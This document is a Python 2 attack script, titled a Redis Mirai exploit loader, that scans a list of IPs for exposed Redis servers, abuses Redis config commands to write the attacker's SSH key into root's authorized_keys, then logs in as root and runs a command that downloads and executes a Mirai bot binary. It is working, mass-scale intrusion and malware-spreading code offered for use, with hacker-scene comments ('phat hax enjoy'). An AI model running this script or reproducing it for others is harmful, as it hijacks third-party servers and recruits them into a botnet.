[redis] mirai exploit loader [MUST SETUP id_rsa.pub]

1. #!/usr/bin/python
2. # -*- coding: utf-8 -*-
3. # redis exploit loader modified by Freak
4. # must type ssh-keygen -t rsa -C \"acid_creative\" as root to generate key to hijack redis
5. # phat hax enjoy
6. import random
7. import socket
8. import threading
9. import socket
10. import sys
11. import paramiko
12. import time
13. procIP = []
14. suc = 0
15. command_to_send = \
16.     'cd /tmp; wget http://0.0.0.0/bins/mirai.x86 -O || curl http://0.0.0.0/bins/mirai.x86 -O; chmod 777 mirai.x86; ./mirai.x86'
17.  
18.  
19. def getLinesList(fileLoc):
20.     buf = []
21.     with file(fileLoc, 'r') as f:
22.         for line in f:
23.             buf.append(line)
24.     return buf
25.  
26.  
27. def writeSuc(file_name, content):
28.     try:
29.         if content not in file(file_name, 'r'):
30.             with file(file_name, 'a+') as f:
31.                 f.write(content)
32.     except Exception, e:
33.         pass
34.  
35.  
36. def main():
37.     if len(sys.argv) < 3:
38.         sys.exit('Usage: <ip_list> <ip_output_file>\n')
39.  
40. global running
41. running = 0
42.  
43. def worker(ipOutput, keyFile, ip):
44.     try:
45.         global running
46.         running += 1
47.         global suc
48.         global procIP
49.         try:
50.             sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
51.             sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
52.             sock.setblocking(False)
53.             sock.settimeout(3)
54.             sock.connect((ip, 6379))
55.             sock.settimeout(None)
56.             sock.send('config set dir /root/.ssh/\n')
57.             buf = sock.recv(4)
58.             if buf.strip() == '+OK':
59.                 print '[+] Good IP ' + ip
60.                 sock.send('set qwe "\\n\\n' + keyFile
61.                           + '''\\n\\n\\n"
62. config set dbfilename "authorized_keys"
63. save
64. ''')
65.                 file_h = open('good.txt', 'a')
66.                 file_h.write(ip + '\n')
67.                 file_h.close()
68.                 suc += 1
69.                 sock.close()  # ssh auto infector
70.                 ssh_port = 22
71.                 user = 'root'
72.                 ssh = paramiko.Transport((ip, ssh_port))
73.                 auth_key = \
74.                     paramiko.RSAKey.from_private_key_file('/root/.ssh/id_rsa'
75.                         )
76.                 ssh.connect(username=user, pkey=auth_key)
77.                 session = ssh.open_channel()
78.                 session.exec_command(command_to_send)
79.                 time.sleep(10)
80.                 ssh.close()
81.             else:
82.                 sock.close()
83.             print '[%s/%s] Bad IP --> %s' % (str(suc),
84.                     str(len(ipList)), ip)
85.         except Exception, e:
86.             print "[%s/%s] Bad IP (can't connect at all) --> %s" \
87.                 % (str(suc), str(len(ipList)), ip)
88.     except Exception, e:
89.         print e
90.     running -= 1
91.  
92. ipList = getLinesList(sys.argv[1])
93. ipOutput = sys.argv[2]
94. keyFile = file('/root/.ssh/id_rsa.pub', 'r').read().strip()
95. threads = []
96. for ip in ipList:
97.     t = threading.Thread(target=worker, args=(ipOutput, keyFile, ip))
98.     threads.append(t)
99. for x in threads:
100.     while running > 512:
101.         time.sleep(1)
102.     x.start()
103. for x in threads:
104.     x.join()
105.  
106.  
107.  
108. if __name__ == '__main__':
109.     main()
110.